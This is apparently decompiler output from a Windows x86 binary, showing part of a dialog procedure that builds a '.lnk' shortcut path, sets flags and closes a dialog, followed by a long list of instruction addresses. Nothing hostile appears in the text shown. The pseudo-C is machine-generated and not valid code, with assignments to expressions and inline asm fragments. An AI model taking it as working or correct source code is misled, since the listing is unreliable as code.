											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1844 = E00CD0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
										}
										L160:
										__eflags =  *((short*)(__ebp - 0x11894));
										if( *((short*)(__ebp - 0x11894)) != 0) {
											__ebp - 0x9894 = __ebp - 0x11894;
											__eax = E00CCB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
										}
										__ebp - 0xb894 = __ebp - 0x688c;
										__eax = E00CCB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
										__eflags =  *(__ebp - 0x2844);
										if(__eflags == 0) {
											__ebp - 0x2844 = E00CDB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
										}
										__ebp - 0x2844 = E00CCB690(__eflags, __ebp - 0x2844, __esi);
										__eflags =  *((short*)(__ebp - 0x17894));
										if(__eflags != 0) {
											__ebp - 0x17894 = __ebp - 0x2844;
											E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
											__eax = E00CCB690(__eflags, __ebp - 0x2844, __esi);
										}
										__ebp - 0x2844 = __ebp - 0xc894;
										__eax = E00CD0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
										__eflags =  *(__ebp - 0x13894);
										__eax = __ebp - 0x13894;
										if(__eflags == 0) {
											__eax = __ebp - 0x19894;
										}
										__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
										__eax = __ebp - 0x2844;
										__eflags = E00CCB92D(__ebp - 0x2844);
										if(__eflags == 0) {
											L170:
											__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
											goto L171;
										} else {
											L169:
											__eflags = __eax;
											if(__eflags == 0) {
												L171:
												__ebx = 0;
												__ebp - 0x2844 = E00CCA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
												__ebp - 0xb894 = __ebp - 0xa894;
												E00CD0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
												__eax = E00CCC2E4(__eflags, __ebp - 0xa894);
												__esi =  *(__ebp - 0x1844) & 0x0000ffff;
												__eax = __ebp - 0x1844;
												__edx =  *(__ebp - 0x9894) & 0x0000ffff;
												__edi = __ebp - 0xa894;
												__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
												asm("sbb esi, esi");
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
												__eax = __ebp - 0x9894;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
												__eax = __ebp - 0x15894;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
												 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
												asm("sbb eax, eax");
												 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
												__ebp - 0xb894 = E00CDA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
												__eflags =  *(__ebp - 0xc894) - __bx;
												if( *(__ebp - 0xc894) != __bx) {
													_push(0);
													__eax = __ebp - 0xc894;
													_push(__ebp - 0xc894);
													_push(5);
													_push(0x1000);
													__eax =  *0xd2308c();
												}
												goto L175;
											}
											goto L170;
										}
									}
								case 0xa:
									L173:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xd0a470 = 1;
									}
									goto L175;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eax = E00CE79E9( *(__ebp - 0x588c) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xd08461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xd08462 = 1;
										} else {
											__eax = 0;
											 *0xd08461 = __al;
											 *0xd08462 = __al;
										}
									}
									goto L175;
								case 0xc:
									L104:
									 *0xd17b7a = 1;
									__eax = __eax + 0xd17b7a;
									_t117 = __esi + 0x39;
									 *_t117 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t117;
									__ebp = 0xffffa774;
									if( *_t117 != 0) {
										_t119 = __ebp - 0x588c; // 0xffff4ee8
										__eax = _t119;
										 *0xcfe728 = E00CD1FA7(_t119);
									}
									goto L175;
							}
							L2:
							_push(0x1000);
							_push(_t294);
							_push(_t226);
							_t226 = E00CDAF98();
							_t294 = _t294 + 0x2000;
							_t292 = _t292 - 1;
							if(_t292 != 0) {
								goto L2;
							} else {
								_t295 = _t292;
								goto L4;
							}
						}
						L176:
						 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
						return _t225;
					}
					L111:
					__eflags =  *0xd0c575 - __bl;
					if( *0xd0c575 != __bl) {
						goto L175;
					}
					L112:
					__eax = 0;
					 *(__ebp - 0x444) = __ax;
					__eax = __ebp - 0x588c;
					_push(__ebp - 0x588c);
					__eax = E00CE22C6(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L119:
						__eflags =  *(__ebp - 0x444) - __bx;
						if( *(__ebp - 0x444) == __bx) {
							__ebp - 0x1b894 = __ebp - 0x588c;
							E00CD0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
							__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
						}
						__ebp - 0x588c = E00CDADD2(__ebp - 0x588c);
						__eax = 0;
						 *(__ebp - 0x488c) = __ax;
						__ebp - 0x444 = __ebp - 0x588c;
						__eax = E00CDA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
						__eflags = __eax - 6;
						if(__eax != 6) {
							__eax = 0;
							 *0xd08454 = 1;
							 *0xd0946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
						}
						goto L175;
					}
					L113:
					__ax =  *(__ebp - 0x588c);
					__esi = __ebx;
					__eflags = __ax;
					if(__ax == 0) {
						goto L119;
					}
					L114:
					__ecx = __ax & 0x0000ffff;
					while(1) {
						L115:
						__eflags = __cx - 0x40;
						if(__cx == 0x40) {
							break;
						}
						L116:
						__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
						__esi =  &(__esi->i);
						__ecx = __eax;
						__eflags = __ax;
						if(__ax != 0) {
							continue;
						}
						L117:
						goto L119;
					}
					L118:
					__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
					__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x444, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x588c) = __ax;
					goto L119;
					L123:
					__eflags = __ebx - 7;
					if(__ebx == 7) {
						__eflags =  *0xd0a46c - 0x800;
						if( *0xd0a46c == 0x800) {
							 *0xd0a46c = 2;
						}
						 *0xd09468 = 1;
					}
					goto L175;
				}
			}









                                                    0x00cdce87
                                                    0x00cdce87
                                                    0x00cdce87
                                                    0x00cdce8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce90
                                                    0x00cdce90
                                                    0x00cdce96
                                                    0x00cdcea4
                                                    0x00cdceab
                                                    0x00cdceb0
                                                    0x00cdceb2
                                                    0x00cdceb4
                                                    0x00cdceb9
                                                    0x00cdceb9
                                                    0x00cdceb9
                                                    0x00cdced1
                                                    0x00cdcede
                                                    0x00cdcee3
                                                    0x00cdcee5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdceb7
                                                    0x00cdceb7
                                                    0x00cdceb7
                                                    0x00cdceb8
                                                    0x00cdceb8
                                                    0x00cdcee7
                                                    0x00cdcef1
                                                    0x00cdcef7
                                                    0x00cdcefe
                                                    0x00cdd3d9
                                                    0x00cdd3d9
                                                    0x00cdd3d9
                                                    0x00cdd3de
                                                    0x00cdd3e2
                                                    0x00cdd3e6
                                                    0x00cdd3ed
                                                    0x00cdd3f4
                                                    0x00cdd3f7
                                                    0x00cdd3fc
                                                    0x00cdd3ff
                                                    0x00cdd404
                                                    0x00cdc795
                                                    0x00cdc79b
                                                    0x00cdc7a1
                                                    0x00cdc7a1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7bb
                                                    0x00cdc7d2
                                                    0x00cdc7d6
                                                    0x00000000
                                                    0x00cdc7d8
                                                    0x00000000
                                                    0x00cdc7d8
                                                    0x00cdc7d6
                                                    0x00cdc7dd
                                                    0x00cdc7e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7e6
                                                    0x00cdc7e6
                                                    0x00000000
                                                    0x00cdc7ed
                                                    0x00cdc7ed
                                                    0x00cdc7f0
                                                    0x00cdc803
                                                    0x00cdc829
                                                    0x00cdc83d
                                                    0x00cdc840
                                                    0x00cdc84b
                                                    0x00cdc98f
                                                    0x00cdc98f
                                                    0x00cdc98f
                                                    0x00cdc99d
                                                    0x00cdc9a2
                                                    0x00cdc9a4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc855
                                                    0x00cdc85d
                                                    0x00cdc863
                                                    0x00cdc869
                                                    0x00cdc90f
                                                    0x00cdc916
                                                    0x00cdc91c
                                                    0x00cdc91f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc921
                                                    0x00cdc928
                                                    0x00cdc92e
                                                    0x00cdc930
                                                    0x00000000
                                                    0x00cdc932
                                                    0x00cdc932
                                                    0x00cdc934
                                                    0x00cdc935
                                                    0x00cdc939
                                                    0x00cdc94d
                                                    0x00cdc952
                                                    0x00cdc95c
                                                    0x00cdc962
                                                    0x00cdc965
                                                    0x00cdc937
                                                    0x00cdc937
                                                    0x00cdc938
                                                    0x00000000
                                                    0x00cdc967
                                                    0x00cdc975
                                                    0x00cdc97b
                                                    0x00cdc97d
                                                    0x00cdc989
                                                    0x00cdc989
                                                    0x00000000
                                                    0x00cdc97d
                                                    0x00cdc965
                                                    0x00cdc930
                                                    0x00cdc86f
                                                    0x00cdc87e
                                                    0x00cdc88b
                                                    0x00cdc89c
                                                    0x00cdc89f
                                                    0x00cdc8a2
                                                    0x00cdc8b5
                                                    0x00cdc8bc
                                                    0x00cdc8c1
                                                    0x00cdc8c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8c9
                                                    0x00cdc8d0
                                                    0x00cdc8d5
                                                    0x00cdc8da
                                                    0x00cdc8e6
                                                    0x00cdc8eb
                                                    0x00cdc8ee
                                                    0x00cdc8f5
                                                    0x00cdc8f7
                                                    0x00cdc8f8
                                                    0x00cdc902
                                                    0x00cdc908
                                                    0x00cdc909
                                                    0x00000000
                                                    0x00cdc909
                                                    0x00cdc8a4
                                                    0x00cdc8ab
                                                    0x00cdc8b1
                                                    0x00cdc8b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc8b3
                                                    0x00cdc9aa
                                                    0x00cdc9aa
                                                    0x00cdc9b4
                                                    0x00cdc9b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc9be
                                                    0x00cdc9be
                                                    0x00cdc9c0
                                                    0x00000000
                                                    0x00cdc9c6
                                                    0x00cdc9c6
                                                    0x00cdc9cb
                                                    0x00cdc9cd
                                                    0x00cdc9d0
                                                    0x00cdc9d2
                                                    0x00cdc9df
                                                    0x00cdc9e4
                                                    0x00cdc9e5
                                                    0x00cdc9e5
                                                    0x00cdc9e6
                                                    0x00cdc9e9
                                                    0x00cdc9eb
                                                    0x00cdc9f5
                                                    0x00cdc9f8
                                                    0x00cdc9fe
                                                    0x00cdca00
                                                    0x00cdc9ed
                                                    0x00cdc9ed
                                                    0x00cdc9ed
                                                    0x00cdca05
                                                    0x00cdca07
                                                    0x00cdca10
                                                    0x00cdca10
                                                    0x00cdca12
                                                    0x00cdca13
                                                    0x00cdca18
                                                    0x00cdca21
                                                    0x00cdca22
                                                    0x00cdca28
                                                    0x00cdca2d
                                                    0x00cdca30
                                                    0x00cdca32
                                                    0x00cdca4b
                                                    0x00cdca4b
                                                    0x00cdca4d
                                                    0x00cdca54
                                                    0x00cdca59
                                                    0x00000000
                                                    0x00cdca4d
                                                    0x00cdca34
                                                    0x00cdca34
                                                    0x00cdca39
                                                    0x00cdca3b
                                                    0x00cdca3d
                                                    0x00cdca3d
                                                    0x00cdca3f
                                                    0x00cdca3f
                                                    0x00cdca42
                                                    0x00cdca44
                                                    0x00cdca49
                                                    0x00cdca4a
                                                    0x00000000
                                                    0x00cdca4a
                                                    0x00000000
                                                    0x00cdca5f
                                                    0x00cdca5f
                                                    0x00cdca61
                                                    0x00cdca71
                                                    0x00cdca71
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca7c
                                                    0x00cdca7c
                                                    0x00cdca7e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca84
                                                    0x00cdca84
                                                    0x00cdca8b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdca91
                                                    0x00cdca91
                                                    0x00cdca93
                                                    0x00cdca99
                                                    0x00cdca9b
                                                    0x00cdcaa2
                                                    0x00cdcaa3
                                                    0x00cdcaaa
                                                    0x00cdcaac
                                                    0x00cdcaac
                                                    0x00cdcab3
                                                    0x00cdcab8
                                                    0x00cdcabe
                                                    0x00cdcac0
                                                    0x00000000
                                                    0x00cdcac6
                                                    0x00cdcac6
                                                    0x00cdcac6
                                                    0x00cdcac9
                                                    0x00cdcacb
                                                    0x00cdcacc
                                                    0x00cdcacf
                                                    0x00cdcaf8
                                                    0x00cdcaf8
                                                    0x00cdcafb
                                                    0x00cdcbe0
                                                    0x00cdcbe9
                                                    0x00cdcbee
                                                    0x00cdcbee
                                                    0x00cdcbf0
                                                    0x00cdcbf0
                                                    0x00cdcbf2
                                                    0x00cdcbf4
                                                    0x00cdcbfb
                                                    0x00cdcc00
                                                    0x00cdcc01
                                                    0x00cdcc02
                                                    0x00cdcc04
                                                    0x00cdcc06
                                                    0x00cdcc0a
                                                    0x00cdcc0c
                                                    0x00cdcc0c
                                                    0x00cdcc0e
                                                    0x00cdcc0e
                                                    0x00cdcc0a
                                                    0x00cdcc12
                                                    0x00cdcc18
                                                    0x00cdcc25
                                                    0x00cdcc2c
                                                    0x00cdcc3c
                                                    0x00cdcc46
                                                    0x00cdcc54
                                                    0x00cdcc5a
                                                    0x00cdcc62
                                                    0x00cdcc67
                                                    0x00cdcc68
                                                    0x00cdcc69
                                                    0x00cdcc6b
                                                    0x00cdcc7f
                                                    0x00cdcc7f
                                                    0x00000000
                                                    0x00cdcc6b
                                                    0x00cdcb01
                                                    0x00cdcb01
                                                    0x00cdcb04
                                                    0x00cdcb11
                                                    0x00cdcb11
                                                    0x00cdcb14
                                                    0x00cdcb16
                                                    0x00cdcb17
                                                    0x00cdcb19
                                                    0x00cdcb1a
                                                    0x00cdcb1f
                                                    0x00cdcb24
                                                    0x00cdcb2a
                                                    0x00cdcb2c
                                                    0x00cdcb2e
                                                    0x00cdcb31
                                                    0x00cdcb38
                                                    0x00cdcb39
                                                    0x00cdcb3f
                                                    0x00cdcb40
                                                    0x00cdcb43
                                                    0x00cdcb44
                                                    0x00cdcb45
                                                    0x00cdcb4a
                                                    0x00cdcb4d
                                                    0x00cdcb53
                                                    0x00cdcb5c
                                                    0x00cdcb5f
                                                    0x00cdcb64
                                                    0x00cdcb66
                                                    0x00cdcb68
                                                    0x00cdcb6a
                                                    0x00cdcb6a
                                                    0x00cdcb6c
                                                    0x00cdcb6c
                                                    0x00cdcb6e
                                                    0x00cdcb6e
                                                    0x00cdcb76
                                                    0x00cdcb7d
                                                    0x00cdcb7f
                                                    0x00cdcb86
                                                    0x00cdcb8c
                                                    0x00cdcb8e
                                                    0x00cdcb8f
                                                    0x00cdcb97
                                                    0x00cdcba6
                                                    0x00cdcba6
                                                    0x00cdcb97
                                                    0x00cdcbb1
                                                    0x00cdcbb3
                                                    0x00cdcbc2
                                                    0x00cdcbc8
                                                    0x00cdcbce
                                                    0x00cdcbd9
                                                    0x00cdcbd9
                                                    0x00000000
                                                    0x00cdcbce
                                                    0x00cdcb06
                                                    0x00cdcb06
                                                    0x00cdcb0b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcb0b
                                                    0x00cdcad1
                                                    0x00cdcad1
                                                    0x00cdcad5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcad7
                                                    0x00cdcad7
                                                    0x00cdcada
                                                    0x00cdcadc
                                                    0x00cdcadf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcae5
                                                    0x00cdcaee
                                                    0x00000000
                                                    0x00cdcaee
                                                    0x00000000
                                                    0x00cdcc8a
                                                    0x00cdcc8a
                                                    0x00cdcc8b
                                                    0x00cdcc90
                                                    0x00cdcc92
                                                    0x00cdcc95
                                                    0x00cdcc95
                                                    0x00000000
                                                    0x00cdcccb
                                                    0x00cdcccb
                                                    0x00cdccd2
                                                    0x00cdccd4
                                                    0x00cdccd4
                                                    0x00cdccd6
                                                    0x00cdcd05
                                                    0x00cdcd05
                                                    0x00cdcd0b
                                                    0x00000000
                                                    0x00cdcd0b
                                                    0x00cdccd8
                                                    0x00cdccd8
                                                    0x00cdccd8
                                                    0x00cdccdb
                                                    0x00cdccf4
                                                    0x00cdccf4
                                                    0x00cdccfa
                                                    0x00cdccfa
                                                    0x00000000
                                                    0x00cdccfa
                                                    0x00cdccdd
                                                    0x00cdccdd
                                                    0x00cdccdd
                                                    0x00cdcce0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcce2
                                                    0x00cdcce2
                                                    0x00cdcce2
                                                    0x00cdcce5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcceb
                                                    0x00cdcceb
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd58
                                                    0x00cdcd58
                                                    0x00cdcd5a
                                                    0x00cdcd61
                                                    0x00cdcd62
                                                    0x00cdcd68
                                                    0x00cdcd70
                                                    0x00cdcd72
                                                    0x00cdcd75
                                                    0x00cdce25
                                                    0x00cdce25
                                                    0x00cdce29
                                                    0x00cdce38
                                                    0x00cdce38
                                                    0x00cdce3c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce42
                                                    0x00cdce42
                                                    0x00cdce45
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce4b
                                                    0x00cdce4b
                                                    0x00cdce4b
                                                    0x00cdce4d
                                                    0x00cdce4e
                                                    0x00cdce4e
                                                    0x00cdce4f
                                                    0x00cdce50
                                                    0x00cdce53
                                                    0x00000000
                                                    0x00cdce53
                                                    0x00cdce2b
                                                    0x00cdce2b
                                                    0x00cdce2e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00cdce34
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00cdcd7b
                                                    0x00cdcd7b
                                                    0x00cdcd81
                                                    0x00cdcd83
                                                    0x00cdcd84
                                                    0x00cdcd89
                                                    0x00cdcd8a
                                                    0x00cdcd8b
                                                    0x00cdcd8d
                                                    0x00cdce22
                                                    0x00cdce22
                                                    0x00000000
                                                    0x00cdce22
                                                    0x00cdcd93
                                                    0x00cdcd93
                                                    0x00cdcd93
                                                    0x00cdcd96
                                                    0x00cdcd99
                                                    0x00cdcd9b
                                                    0x00cdcd9e
                                                    0x00cdcda4
                                                    0x00cdcda6
                                                    0x00cdcda7
                                                    0x00cdcdad
                                                    0x00cdcdae
                                                    0x00cdcdb3
                                                    0x00cdcdb6
                                                    0x00cdcdb8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdba
                                                    0x00cdcdba
                                                    0x00cdcdbc
                                                    0x00cdcdbc
                                                    0x00cdcdbc
                                                    0x00cdcdc4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdc6
                                                    0x00cdcdcb
                                                    0x00cdcdd2
                                                    0x00cdcdd7
                                                    0x00cdcdde
                                                    0x00cdcde0
                                                    0x00cdcde2
                                                    0x00cdcde9
                                                    0x00cdcdee
                                                    0x00cdcdf0
                                                    0x00cdcdf2
                                                    0x00cdcdf4
                                                    0x00cdcdf4
                                                    0x00cdcdfa
                                                    0x00cdce01
                                                    0x00cdce06
                                                    0x00cdce08
                                                    0x00cdce0a
                                                    0x00cdce0c
                                                    0x00cdce0c
                                                    0x00cdce0d
                                                    0x00cdce0f
                                                    0x00cdce15
                                                    0x00cdce16
                                                    0x00cdce1c
                                                    0x00cdce1e
                                                    0x00cdce20
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce20
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd030
                                                    0x00cdd030
                                                    0x00cdd033
                                                    0x00cdd035
                                                    0x00cdd03c
                                                    0x00cdd03e
                                                    0x00cdd044
                                                    0x00cdd045
                                                    0x00cdd04a
                                                    0x00cdd04b
                                                    0x00cdd04b
                                                    0x00cdd050
                                                    0x00cdd053
                                                    0x00cdd059
                                                    0x00cdd059
                                                    0x00cdd05e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd06a
                                                    0x00cdd06a
                                                    0x00cdd06d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd073
                                                    0x00cdd073
                                                    0x00cdd075
                                                    0x00cdd07c
                                                    0x00cdd084
                                                    0x00cdd08a
                                                    0x00cdd08d
                                                    0x00cdd0b0
                                                    0x00cdd0b7
                                                    0x00cdd08f
                                                    0x00cdd08f
                                                    0x00cdd092
                                                    0x00cdd0a2
                                                    0x00cdd0a9
                                                    0x00cdd094
                                                    0x00cdd094
                                                    0x00cdd09b
                                                    0x00cdd09b
                                                    0x00cdd092
                                                    0x00cdd0bc
                                                    0x00cdd0ca
                                                    0x00cdd0cf
                                                    0x00cdd0d1
                                                    0x00cdd0d8
                                                    0x00cdd0e7
                                                    0x00cdd0ee
                                                    0x00cdd0f3
                                                    0x00cdd0f5
                                                    0x00cdd0f6
                                                    0x00cdd0fd
                                                    0x00cdd149
                                                    0x00cdd150
                                                    0x00cdd155
                                                    0x00cdd157
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd15d
                                                    0x00cdd15d
                                                    0x00cdd164
                                                    0x00cdd16a
                                                    0x00cdd16c
                                                    0x00cdd16f
                                                    0x00cdd221
                                                    0x00cdd221
                                                    0x00000000
                                                    0x00cdd221
                                                    0x00cdd175
                                                    0x00cdd175
                                                    0x00cdd178
                                                    0x00cdd178
                                                    0x00cdd178
                                                    0x00cdd17a
                                                    0x00cdd17b
                                                    0x00cdd17e
                                                    0x00cdd188
                                                    0x00cdd188
                                                    0x00cdd18a
                                                    0x00cdd194
                                                    0x00cdd199
                                                    0x00cdd19b
                                                    0x00cdd1fd
                                                    0x00cdd1fd
                                                    0x00000000
                                                    0x00cdd1fd
                                                    0x00cdd19d
                                                    0x00cdd1a4
                                                    0x00cdd1aa
                                                    0x00cdd1af
                                                    0x00cdd1b1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1b3
                                                    0x00cdd1b3
                                                    0x00cdd1b5
                                                    0x00cdd1b6
                                                    0x00cdd1b9
                                                    0x00cdd1bb
                                                    0x00cdd1be
                                                    0x00cdd1d4
                                                    0x00cdd1d4
                                                    0x00cdd1d6
                                                    0x00cdd1d8
                                                    0x00cdd1de
                                                    0x00cdd1de
                                                    0x00cdd1de
                                                    0x00cdd1e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1e3
                                                    0x00cdd1e3
                                                    0x00cdd1e9
                                                    0x00cdd1eb
                                                    0x00cdd1f0
                                                    0x00cdd1f3
                                                    0x00cdd1f8
                                                    0x00000000
                                                    0x00cdd1f8
                                                    0x00cdd1c0
                                                    0x00cdd1c0
                                                    0x00cdd1c7
                                                    0x00cdd1cc
                                                    0x00000000
                                                    0x00cdd1cc
                                                    0x00cdd180
                                                    0x00cdd180
                                                    0x00cdd182
                                                    0x00cdd183
                                                    0x00cdd186
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd200
                                                    0x00cdd200
                                                    0x00cdd203
                                                    0x00cdd206
                                                    0x00cdd208
                                                    0x00cdd208
                                                    0x00cdd211
                                                    0x00cdd216
                                                    0x00cdd218
                                                    0x00cdd21a
                                                    0x00cdd21c
                                                    0x00cdd21c
                                                    0x00000000
                                                    0x00cdd0ff
                                                    0x00cdd0ff
                                                    0x00cdd107
                                                    0x00cdd113
                                                    0x00cdd119
                                                    0x00cdd11a
                                                    0x00cdd11b
                                                    0x00cdd120
                                                    0x00cdd121
                                                    0x00cdd122
                                                    0x00cdd124
                                                    0x00cdd12a
                                                    0x00cdd12c
                                                    0x00cdd13f
                                                    0x00cdd13f
                                                    0x00cdd226
                                                    0x00cdd226
                                                    0x00cdd22e
                                                    0x00cdd238
                                                    0x00cdd23f
                                                    0x00cdd23f
                                                    0x00cdd24c
                                                    0x00cdd253
                                                    0x00cdd258
                                                    0x00cdd260
                                                    0x00cdd26c
                                                    0x00cdd26c
                                                    0x00cdd279
                                                    0x00cdd27e
                                                    0x00cdd286
                                                    0x00cdd290
                                                    0x00cdd29d
                                                    0x00cdd2a4
                                                    0x00cdd2a4
                                                    0x00cdd2b1
                                                    0x00cdd2b8
                                                    0x00cdd2bd
                                                    0x00cdd2c5
                                                    0x00cdd2cb
                                                    0x00cdd2cd
                                                    0x00cdd2cd
                                                    0x00cdd2e2
                                                    0x00cdd2e7
                                                    0x00cdd2f3
                                                    0x00cdd2f5
                                                    0x00cdd306
                                                    0x00cdd313
                                                    0x00000000
                                                    0x00cdd2f7
                                                    0x00cdd2f7
                                                    0x00cdd302
                                                    0x00cdd304
                                                    0x00cdd318
                                                    0x00cdd318
                                                    0x00cdd324
                                                    0x00cdd331
                                                    0x00cdd33d
                                                    0x00cdd344
                                                    0x00cdd349
                                                    0x00cdd350
                                                    0x00cdd356
                                                    0x00cdd35d
                                                    0x00cdd363
                                                    0x00cdd36a
                                                    0x00cdd36c
                                                    0x00cdd36e
                                                    0x00cdd370
                                                    0x00cdd372
                                                    0x00cdd378
                                                    0x00cdd37a
                                                    0x00cdd37c
                                                    0x00cdd37e
                                                    0x00cdd384
                                                    0x00cdd386
                                                    0x00cdd390
                                                    0x00cdd393
                                                    0x00cdd399
                                                    0x00cdd3a8
                                                    0x00cdd3ad
                                                    0x00cdd3b4
                                                    0x00cdd3b6
                                                    0x00cdd3b7
                                                    0x00cdd3bd
                                                    0x00cdd3be
                                                    0x00cdd3c0
                                                    0x00cdd3c5
                                                    0x00cdd3c5
                                                    0x00000000
                                                    0x00cdd3b4
                                                    0x00000000
                                                    0x00cdd304
                                                    0x00cdd2f5
                                                    0x00000000
                                                    0x00cdd3cd
                                                    0x00cdd3cd
                                                    0x00cdd3d0
                                                    0x00cdd3d2
                                                    0x00cdd3d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd17
                                                    0x00cdcd17
                                                    0x00cdcd1f
                                                    0x00cdcd25
                                                    0x00cdcd28
                                                    0x00cdcd4c
                                                    0x00cdcd2a
                                                    0x00cdcd2a
                                                    0x00cdcd2d
                                                    0x00cdcd40
                                                    0x00cdcd2f
                                                    0x00cdcd2f
                                                    0x00cdcd31
                                                    0x00cdcd36
                                                    0x00cdcd36
                                                    0x00cdcd2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce5d
                                                    0x00cdce5d
                                                    0x00cdce5e
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce66
                                                    0x00cdce6b
                                                    0x00cdce71
                                                    0x00cdce71
                                                    0x00cdce7d
                                                    0x00cdce7d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7a2
                                                    0x00cdc7a2
                                                    0x00cdc7a7
                                                    0x00cdc7a8
                                                    0x00cdc7a9
                                                    0x00cdc7ae
                                                    0x00cdc7b4
                                                    0x00cdc7b7
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdc7b9
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdc7b7
                                                    0x00cdd40a
                                                    0x00cdd410
                                                    0x00cdd418
                                                    0x00cdd418
                                                    0x00cdcf04
                                                    0x00cdcf04
                                                    0x00cdcf0a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf10
                                                    0x00cdcf10
                                                    0x00cdcf12
                                                    0x00cdcf19
                                                    0x00cdcf21
                                                    0x00cdcf22
                                                    0x00cdcf27
                                                    0x00cdcf28
                                                    0x00cdcf29
                                                    0x00cdcf2b
                                                    0x00cdcf7b
                                                    0x00cdcf7b
                                                    0x00cdcf82
                                                    0x00cdcf90
                                                    0x00cdcfa1
                                                    0x00cdcfaf
                                                    0x00cdcfaf
                                                    0x00cdcfbb
                                                    0x00cdcfc0
                                                    0x00cdcfc2
                                                    0x00cdcfd2
                                                    0x00cdcfdc
                                                    0x00cdcfe1
                                                    0x00cdcfe4
                                                    0x00cdcfef
                                                    0x00cdcff1
                                                    0x00cdcff8
                                                    0x00cdcffe
                                                    0x00cdcffe
                                                    0x00000000
                                                    0x00cdcfe4
                                                    0x00cdcf2d
                                                    0x00cdcf2d
                                                    0x00cdcf34
                                                    0x00cdcf36
                                                    0x00cdcf39
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf3b
